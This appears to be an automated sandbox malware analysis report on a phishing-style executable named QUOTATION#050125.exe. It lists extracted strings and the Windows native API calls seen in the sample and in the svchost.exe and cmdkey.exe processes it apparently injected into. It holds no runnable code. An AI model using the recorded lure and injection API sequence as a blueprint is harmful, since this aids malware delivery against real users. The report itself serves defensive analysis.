anSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_d1d263f4-f
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: QUOTATION#050125.exe
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0042CA33 NtClose,3_2_0042CA33
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872B90 NtFreeVirtualMemory,LdrInitializeThunk,3_2_03872B90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872A80 NtClose,LdrInitializeThunk,3_2_03872A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872D10 NtQuerySystemInformation,LdrInitializeThunk,3_2_03872D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038734E0 NtCreateMutant,LdrInitializeThunk,3_2_038734E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03874260 NtSetContextThread,3_2_03874260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03874570 NtSuspendThread,3_2_03874570
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872B80 NtCreateKey,3_2_03872B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872BC0 NtQueryInformationToken,3_2_03872BC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872BE0 NtQueryVirtualMemory,3_2_03872BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872B00 NtQueryValueKey,3_2_03872B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872B10 NtAllocateVirtualMemory,3_2_03872B10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872B20 NtQueryInformationProcess,3_2_03872B20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872AA0 NtQueryInformationFile,3_2_03872AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872AC0 NtEnumerateValueKey,3_2_03872AC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872A10 NtWriteFile,3_2_03872A10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038729D0 NtWaitForSingleObject,3_2_038729D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038729F0 NtReadFile,3_2_038729F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872FB0 NtSetValueKey,3_2_03872FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872F00 NtCreateFile,3_2_03872F00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872F30 NtOpenDirectoryObject,3_2_03872F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872E80 NtCreateProcessEx,3_2_03872E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872EB0 NtProtectVirtualMemory,3_2_03872EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872EC0 NtQuerySection,3_2_03872EC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872ED0 NtResumeThread,3_2_03872ED0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872E00 NtQueueApcThread,3_2_03872E00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872E50 NtCreateSection,3_2_03872E50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872DA0 NtReadVirtualMemory,3_2_03872DA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872DC0 NtAdjustPrivilegesToken,3_2_03872DC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872D50 NtWriteVirtualMemory,3_2_03872D50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872CD0 NtEnumerateKey,3_2_03872CD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872CF0 NtDelayExecution,3_2_03872CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872C10 NtOpenProcess,3_2_03872C10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872C20 NtSetInformationFile,3_2_03872C20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872C30 NtMapViewOfSection,3_2_03872C30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872C50 NtUnmapViewOfSection,3_2_03872C50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038738D0 NtGetContextThread,3_2_038738D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03873C90 NtOpenThread,3_2_03873C90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03873C30 NtOpenProcessToken,3_2_03873C30
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B4260 NtSetContextThread,LdrInitializeThunk,6_2_031B4260
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B4570 NtSuspendThread,LdrInitializeThunk,6_2_031B4570
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B2B10 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_031B2B10
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B2B00 NtQueryValueKey,LdrInitializeThunk,6_2_031B2B00
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B2B90 NtFreeVirtualMemory,LdrInitializeThunk,6_2_031B2B90
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B2B80 NtCreateKey,LdrInitializeThunk,6_2_031B2B80
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B2BC0 NtQueryInformationToken,LdrInitializeThunk,6_2_031B2BC0
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B2A10 NtWriteFile,LdrInitializeThunk,6_2_031B2A10
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B2A80 NtClose,LdrInitializeThunk,6_2_031B2A80
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B2AC0 NtEnumerateValueKey,LdrInitializeThunk,6_2_031B2AC0
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B29F0 NtReadFile,LdrInitializeThunk,6_2_031B29F0
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B2F00 NtCreateFile,LdrInitializeThunk,6_2_031B2F00
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B2E00 NtQueueApcThread,LdrInitializeThunk,6_2_031B2E00
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B2E50 NtCreateSection,LdrInitializeThunk,6_2_031B2E50
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B2ED0 NtResumeThread,LdrInitializeThunk,6_2_031B2ED0
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B2D10 NtQuerySystemInformation,LdrInitializeThunk,6_2_031B2D10
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B2DA0 NtReadVirtualMemory,LdrInitializeThunk,6_2_031B2DA0
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B2C30 NtMapViewOfSection,LdrInitializeThunk,6_2_031B2C30
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B2C50 NtUnmapViewOfSection,LdrInitializeThunk,6_2_031B2C50
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B2CF0 NtDelayExecution,LdrInitializeThunk,6_2_031B2CF0
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B34E0 NtCreateMutant,LdrInitializeThunk,6_2_031B34E0
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B38D0 NtGetContextThread,LdrInitializeThunk,6_2_031B38D0
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B2B20 NtQueryInformationProcess,6_2_031B2B20
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B2BE0 NtQueryVirtualMemory,6_2_031B2BE0
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B2AA0 NtQueryInformationFile,6_2_031B2AA0
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B29D0 NtWaitForSingleObject,6_2_031B29D0
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B2F30 NtOpenDirectoryObject,6_2_031B2F30
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B2FB0 NtSetValueKey,6_2_031B2FB0
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B2E80 NtCreateProcessEx,6_2_031B2E80
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B2EB0 NtProtectVirtualMemory,6_2_031B2EB0
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B2EC0 NtQuerySection,6_2_031B2EC0
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B2D50 NtWriteVirtualMemory,6_2_031B2D50
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B2DC0 NtAdjustPrivilegesToken,6_2_031B2DC0
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B2C10 NtOpenProcess,6_2_031B2C10
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B2C20 NtSetInformationFile,6_2_031B2C20
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B2CD0 NtEnumerateKey,6_2_031B2CD0
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B3C30 NtOpenProcessToken,6_2_031B3C30
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B3C90 NtOpenThread,6_2_031B3C90
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_0303EF38 NtQueryInformationProcess,NtReadVirtualMemory,6_2_0303EF38
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_0303F800 NtMapViewOfSection,6_2_0303F800
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_0012D5EB: CreateFileW,DeviceIoControl,CloseHandle,2_2_0012D5EB
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_00121201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,2_2_00121201
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_0012E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,2_2_0012E8F6
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_001320462_2_00132046
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_000C80602_2_000C8060
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_001282982_2_00128298
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_000FE4FF2_2_000FE4FF
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_000F676B2_2_000F676B
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_001548732_2_00154873
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_000ECAA02_2_000ECAA0
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_000CCAF02_2_000CCAF0
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_000DCC392_2_000DCC39
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_000F6DD92_2_000F6DD9
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_000DB1192_2_000DB119
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_000C91C02_2_000C91C0
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_000E13942_2_000E1394
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_000E17062_2_000E1706
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_000E781B2_2_000E781B
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_000C79202_2_000C7920
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_000D997D2_2_000D997D
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_000E19B02_2_000E19B0
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_000E7A4A2_2_000E7A4A
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_000E1C772_2_000E1C77
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_000E7CA72_2_000E7CA7
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_0014BE442_2_0014BE44
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_000F9EEE2_2_000F9EEE
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_000E1F322_2_000E1F32
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_00E1B6F02_2_00E1B6F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004189433_2_00418943
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0041478E3_2_0041478E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0042F0533_2_0042F053
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004010003_2_00401000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004030D03_2_004030D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004100FA3_2_004100FA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004101033_2_00410103
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004012C03_2_004012C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00416B403_2_00416B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00416B433_2_00416B43
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004103233_2_00410323
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040E3233_2_0040E323
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040E4673_2_0040E467
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040E4733_2_0040E473
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004027803_2_00402780
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384E3103_2_0384E310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0390010E3_2_0390010E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038300A03_2_038300A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038EE0763_2_038EE076
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F67573_2_038F6757
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384A7603_2_0384A760
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038427603_2_03842760
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038406803_2_03840680
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038FA6C03_2_038FA6C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383C6E03_2_0383C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385C6003_2_0385C600
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038646703_2_03864670
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0390A5263_2_0390A526
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038404453_2_03840445
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B4BC03_2_038B4BC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840B103_2_03840B10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E2AC03_2_038E2AC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038FCA133_2_038FCA13
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038FEA5B3_2_038FEA5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383E9A03_2_0383E9A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038FE9A63_2_038FE9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038568823_2_03856882
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DC89F3_2_038DC89F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038428C03_2_038428C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386E8103_2_0386E810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E08353_2_038E0835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038268683_2_03826868
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038FEFBF3_2_038FEFBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03846FE03_2_03846FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384CF003_2_0384CF00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F0EAD3_2_038F0EAD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03832EE83_2_03832EE8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03882E483_2_03882E48
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03860E503_2_03860E50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E0E6D3_2_038E0E6D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03852DB03_2_03852DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383AD003_2_0383AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840D693_2_03840D69
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03858CDF3_2_03858CDF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0390ACEB3_2_0390ACEB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03830C123_2_03830C12
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384AC203_2_0384AC20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038BEC203_2_038BEC20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038EEC4C3_2_038EEC4C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F6C693_2_038F6C69
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038FEC603_2_038FEC60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038313803_2_03831380
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038FF3303_2_038FF330
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382D2EC3_2_0382D2EC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F124C3_2_038F124C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038451C03_2_038451C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385B1E03_2_0385B1E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382F1133_2_0382F113
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DD1303_2_038DD130
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0388717A3_2_0388717A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0387508C3_2_0387508C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384B0D03_2_0384B0D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F70F13_2_038F70F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B36EC3_2_038B36EC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038FF6F63_2_038FF6F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DD62C3_2_038DD62C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E16233_2_038E1623
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038ED6463_2_038ED646
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038FF5C93_2_038FF5C9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F75C63_2_038F75C6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AD4803_2_038AD480
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D54903_2_038D5490
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D1B803_2_038D1B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0387DB193_2_0387DB19
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038FFB2E3_2_038FFB2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038FFA893_2_038FFA89
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385FAA03_2_0385FAA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038859C03_2_038859C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B98B23_2_038B98B2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F18DA3_2_038F18DA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F78F33_2_038F78F3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038438003_2_03843800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038498703_2_03849870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385B8703_2_0385B870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B58703_2_038B5870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038FF8723_2_038FF872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E3FA03_2_038E3FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F1FC63_2_038F1FC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038BFF403_2_038BFF40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038FFF633_2_038FFF63
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03841EB23_2_03841EB2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F9ED23_2_038F9ED2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03849DD03_2_03849DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DFDF43_2_038DFDF4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038FFD273_2_038FFD27
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F7D4C3_2_038F7D4C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D9C983_2_038D9C98
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C7CE83_2_038C7CE8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385FCE03_2_0385FCE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03843C603_2_03843C60
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_0318E3106_2_0318E310
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031422456_2_03142245
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_0324010E6_2_0324010E
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_0322E0766_2_0322E076
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031700A06_2_031700A0
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_032367576_2_03236757
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_0318A7606_2_0318A760
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031827606_2_03182760
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_0319C6006_2_0319C600
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031A46706_2_031A4670
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031806806_2_03180680
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_0323A6C06_2_0323A6C0
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_0317C6E06_2_0317C6E0
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_0324A5266_2_0324A526
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031804456_2_03180445
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_03180B106_2_03180B10
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031F4BC06_2_031F4BC0
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_0323CA136_2_0323CA13
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_0323EA5B6_2_0323EA5B
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_0323E9A66_2_0323E9A6
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_0317E9A06_2_0317E9A0
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031AE8106_2_031AE810
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_032208356_2_03220835
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031668686_2_03166868
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031968826_2_03196882
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_0321C89F6_2_0321C89F
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031828C06_2_031828C0
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_0318CF006_2_0318CF00
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_0323EFBF6_2_0323EFBF
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_03186FE06_2_03186FE0
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031A0E506_2_031A0E50
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_03220E6D6_2_03220E6D
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031C2E486_2_031C2E48
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_03230EAD6_2_03230EAD
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_03172EE86_2_03172EE8
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_0317AD006_2_0317AD00
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_03180D696_2_03180D69
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_03192DB06_2_03192DB0
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_03170C126_2_03170C12
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_0318AC206_2_0318AC20
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031FEC206_2_031FEC20
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_0323EC606_2_0323EC60
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_03236C696_2_03236C69
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_0322EC4C6_2_0322EC4C
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_03198CDF6_2_03198CDF
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_0324ACEB6_2_0324ACEB
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_03188CE06_2_03188CE0
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_0323F3306_2_0323F330
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031713806_2_03171380
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_0323124C6_2_0323124C
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_0316D2EC6_2_0316D2EC
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_0316F1136_2_0316F113
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_0321D1306_2_0321D130
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031C717A6_2_031C717A
